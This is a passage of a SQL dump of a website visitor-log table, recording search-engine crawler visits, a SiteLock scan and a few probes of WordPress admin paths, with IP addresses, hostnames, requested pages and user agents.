(compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9006,'0b_4dff94883b90efd397ff4264fa51121e','1458968025','46.165.197.141','46.165.197.141','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(9008,'0b_4dff94883b90efd397ff4264fa51121e','1458968037','46.165.197.141','46.165.197.141','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9009,'0b_b7b3341f48729c2cae367fdb8d6abb4b','1458968591','100.43.91.26','spider-100-43-91-26.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(9011,'0b_0c7f4d2f13d1270485fe61b7b856743c','1458970265','198.54.90.200','198.54.90.200','/','Mozilla/5.0 (compatible; +http://servernfo.com/)','','',0,'','','','','','','','','','0','0',0),(9014,'0b_bce5dcace215a13f8e45495d38f0b67b','1458970405','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9015,'0b_0c7f4d2f13d1270485fe61b7b856743c','1458971277','198.54.90.200','198.54.90.200','/','Mozilla/5.0 (compatible; +http://servernfo.com/)','','',0,'','','','','','','','','','0','0',0),(9018,'0b_6c4c382fefeea1592421b180b47ad1dc','1458972028','5.9.63.149','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(9020,'0b_6c4c382fefeea1592421b180b47ad1dc','1458972030','5.9.63.149','majestic12.co.uk','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(9021,'0b_47e958e765c5cf468a4c7a3e9d298018','1458974330','100.43.81.152','spider-100-43-81-152.yandex.com','/SSO/235_19.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9024,'0b_940ed6e161f1d2f9203ffd866f3c7253','1458975928','141.8.143.235','spider-141-8-143-235.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9026,'0b_1ecb5e1e8f4152a162818159f4213b28','1458977168','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9029,'0b_61292e74758bc1e7336009ad1d4e0fc3','1458978421','66.249.75.89','crawl-66-249-75-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9032,'0b_3abf270198a7b327e4586e2d1e42d93a','1458980979','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9035,'0b_4eb79404252243d4e81fc4effc03f554','1458981943','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9038,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984807','107.170.107.15','107.170.107.15','/robots.txt','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(9041,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984818','107.170.107.15','107.170.107.15','/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(9044,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984829','107.170.107.15','107.170.107.15','/igo/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9047,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984842','107.170.107.15','107.170.107.15','/forms/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9050,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984853','107.170.107.15','107.170.107.15','/contact/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9053,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984864','107.170.107.15','107.170.107.15','/about-us/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9056,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984875','107.170.107.15','107.170.107.15','/carriers/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9059,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984886','107.170.107.15','107.170.107.15','/register/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9060,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984896','107.170.107.15','107.170.107.15','/insentives/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9062,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984907','107.170.107.15','107.170.107.15','/?page_id=169','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(9065,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984918','107.170.107.15','107.170.107.15','/agent-tools/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9068,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984928','107.170.107.15','107.170.107.15','/case-status/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9071,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984939','107.170.107.15','107.170.107.15','/term-quotes/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9072,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984950','107.170.107.15','107.170.107.15','/licensing-contracting/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9075,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984961','107.170.107.15','107.170.107.15','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(9077,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984972','107.170.107.15','107.170.107.15','/members/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'','','us','','','spbot','','','','3','0',0),(9078,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984983','107.170.107.15','107.170.107.15','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/','',0,'','','us','','','spbot','','','','3','0',0),(9081,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458984993','107.170.107.15','107.170.107.15','/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/meet-the-eib-team/','',0,'','','us','','','spbot','','','','3','0',0),(9083,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458985004','107.170.107.15','107.170.107.15','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9086,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458985014','107.170.107.15','107.170.107.15','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9087,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458985025','107.170.107.15','107.170.107.15','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9090,'0b_0c54aca8c87a546ce8bb2527a38f015e','1458985036','107.170.107.15','107.170.107.15','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(9092,'0b_72e4ffd7b93199b69db21d92c646e9ae','1458986542','98.143.158.50','98.143.158.50.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(9093,'0b_f9d6187a88b854e460b67f0ae5eae63b','1458987163','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9095,'0b_637633570afebd628bd6afa23c88e0b4','1458987696','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9096,'0b_ae4dc2c669269381e5222c620493d147','1458996846','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9099,'0b_2b1e5b92586bec1d22f7a0b166fcb95e','1458998905','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9101,'0b_ab069e595d8eb419f1d0bd543e6762da','1459001202','66.249.75.102','crawl-66-249-75-102.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9104,'0b_7b9c5495b4f2325320de6da39aaf30b6','1459004766','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9107,'0b_7b9c5495b4f2325320de6da39aaf30b6','1459004769','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9108,'0b_7b9c5495b4f2325320de6da39aaf30b6','1459004771','67.212.162.98','scan03.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9110,'0b_7b9c5495b4f2325320de6da39aaf30b6','1459004773','67.212.162.98','scan03.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9113,'0b_7b9c5495b4f2325320de6da39aaf30b6','1459004776','67.212.162.98','scan03.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9116,'0b_7b9c5495b4f2325320de6da39aaf30b6','1459004778','67.212.162.98','scan03.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9117,'0b_d873bba90048a660cf30fbc959e6071a','1459012124','52.88.178.84','ec2-52-88-178-84.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','empireins.com','',0,'Win8','Chrome 34','','','','','','','','2','0',0),(9119,'0b_2273ac93568abb5f865b5629aa9c73d1','1459013239','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(9122,'0b_d0386912b77f8f4e87c86bbf08838beb','1459019299','69.194.230.3','giants.unisonplatform.com','/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9125,'0b_5f899b79f825ca6371c402ae0dfbc15b','1459019797','178.254.50.101','server101.greatnet.de','/test/wp-admin/','','','',0,'','','de','','','Unknown Spider','','','','0','0',0),(9126,'0b_46f82b9e17a215a28e0f1698303d1979','1459020283','62.206.102.86','chewbacca.tuxhomenet.de','/wordpress/wp-admin/','','','',0,'','','de','','','Unknown Spider','','','','0','0',0),(9128,'0b_4fdf7339f91bf0cc33580ab15a3829ce','1459020762','198.27.65.66','euro-shared.olnevhost.net','/blog/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9131,'0b_b72618923edeeb56d7930af9b099b9f5','1459021725','72.167.131.38','p3slh157.shr.phx3.secureserver.net','/old/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9134,'0b_c797495b82029072f6c8fe3d9ebefe02','1459022246','216.81.71.88','216.81.71.88','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(9135,'0b_57d0becaa2f184ab64b3d52f2ff3c52c','1459023722','66.249.75.103','crawl-66-249-75-103.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9137,'0b_ea80623e6a7dacac1092fcaaaa90ecf3','1459023740','66.249.75.89','crawl-66-249-75-89.googlebot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9138,'0b_1ac08ffd96b871467d1882c282743da7','1459025279','180.76.15.25','baiduspider-180-76-15-25.crawl.baidu.com','/insentives/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(9141,'0b_3192f242c76394e89f975bc87d798fa8','1459026222','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9143,'0b_3192f242c76394e89f975bc87d798fa8','1459026244','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9146,'0b_4000317bddbd4f8dbd872a06b4406cb5','1459026824','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9149,'0b_da41b7326e34785f8b1f6d18aed0f0b0','1459029736','75.127.10.176','host.colocrossing.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(9150,'0b_da41b7326e34785f8b1f6d18aed0f0b0','1459029739','75.127.10.176','host.colocrossing.com','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(9153,'0b_ec84eeaa61b82435788cf96bc95056fe','1459029824','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9155,'0b_75d3c80e01e4edd463b6dd227be50709','1459029866','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9158,'0b_8c7dacea4645722a68fda4f1374cbf19','1459032074','54.152.56.52','ec2-54-152-56-52.compute-1.amazonaws.com','/','roboto','','',0,'','','','','','','','','','0','0',0),(9159,'0b_e8de6854563d22bb93892523535865c3','1459033223','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9161,'0b_c09dde41849d1da49909030ce192cff6','1459036732','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9164,'0b_4f75dc00d5b59e9af77044a7c7e172b9','1459036912','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9167,'0b_7d4df1105841045f89c28f486c2ba7c6','1459037972','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9168,'0b_7d4df1105841045f89c28f486c2ba7c6','1459037974','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9171,'0b_7d4df1105841045f89c28f486c2ba7c6','1459037977','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9173,'0b_475c9818746e1a8d69a8fde3e8a0d0c6','1459038180','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(9176,'0b_3c86eaab663204c6061dea34bb0e5e7c','1459039235','100.43.81.146','spider-100-43-81-146.yandex.com','/products.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9179,'0b_26885c574a5628c814bda433724e1e24','1459041378','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9182,'0b_1cf2b502f43dd885c4829cdb2de17bad','1459041480','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9183,'0b_6f5fb40d52aee35f4161296693ab497f','1459042101','100.43.81.152','spider-100-43-81-152.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9185,'0b_3d517fc5b9f19b2a1843a00d97531b15','1459043238','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9188,'0b_3d42a13f9fef369e741826d7f5b3769e','1459044522','123.125.71.110','baiduspider-123-125-71-110.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(9191,'0b_623ae26764b897ab3349e2e20914ca71','1459045223','66.249.83.209,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(9192,'0b_bad2607a9a648ea793154e87e2d6e6ea','1459047758','208.115.111.66','208-115-111-66-reverse.wowrack.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9194,'0b_286857e2142c3fd7b396a4bfbea954a0','1459050645','66.249.75.102','crawl-66-249-75-102.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9195,'0b_beac5779d2535dcf7326872eea1f5010','1459050646','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(9198,'0b_50bfbd39c583e07f744d7b37c3daf389','1459050647','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(9200,'0b_4b92d7854608c51b6409a1e2514ac3bf','1459051373','66.249.75.103','crawl-66-249-75-103.googlebot.com','/under.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9203,'0b_b669b695a92c806e5752c43c83ff2dfd','1459054481','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9206,'0b_0af256bce4aaba6a8d13c61660f7fd87','1459055741','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9207,'0b_a5256e155cf92fc31e888badc93628b1','1459057095','213.239.205.207','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(9210,'0b_a5256e155cf92fc31e888badc93628b1','1459057098','213.239.205.207','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(9213,'0b_8db9d4a830e8c088809a9e765a58ba84','1459057359','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(9216,'0b_995180f793dcb5f9da8cbacc0a7a3114','1459057814','157.55.39.133','msnbot-157-55-39-133.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9219,'0b_1d58244f37da5ef46085e01d1be7d026','1459061994','208.115.111.66','208-115-111-66-reverse.wowrack.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9221,'0b_f19194a9bf6cd3c86c9bc3f0ffb0cb29','1459063082','157.55.39.133','msnbot-157-55-39-133.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9222,'0b_2849f201debd57a761c6b1f44ff2dd9a','1459063082','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9224,'0b_2849f201debd57a761c6b1f44ff2dd9a','1459063084','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9227,'0b_f19194a9bf6cd3c86c9bc3f0ffb0cb29','1459063084','157.55.39.133','msnbot-157-55-39-133.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9228,'0b_2849f201debd57a761c6b1f44ff2dd9a','1459063084','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9231,'0b_f19194a9bf6cd3c86c9bc3f0ffb0cb29','1459063085','157.55.39.133','msnbot-157-55-39-133.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9234,'0b_2849f201debd57a761c6b1f44ff2dd9a','1459063085','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9236,'0b_2849f201debd57a761c6b1f44ff2dd9a','1459063088','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9239,'0b_39aaf202e276fdff853775860aa1d74d','1459063088','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9240,'0b_2849f201debd57a761c6b1f44ff2dd9a','1459063089','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/insentives/','Mozilla/5.0 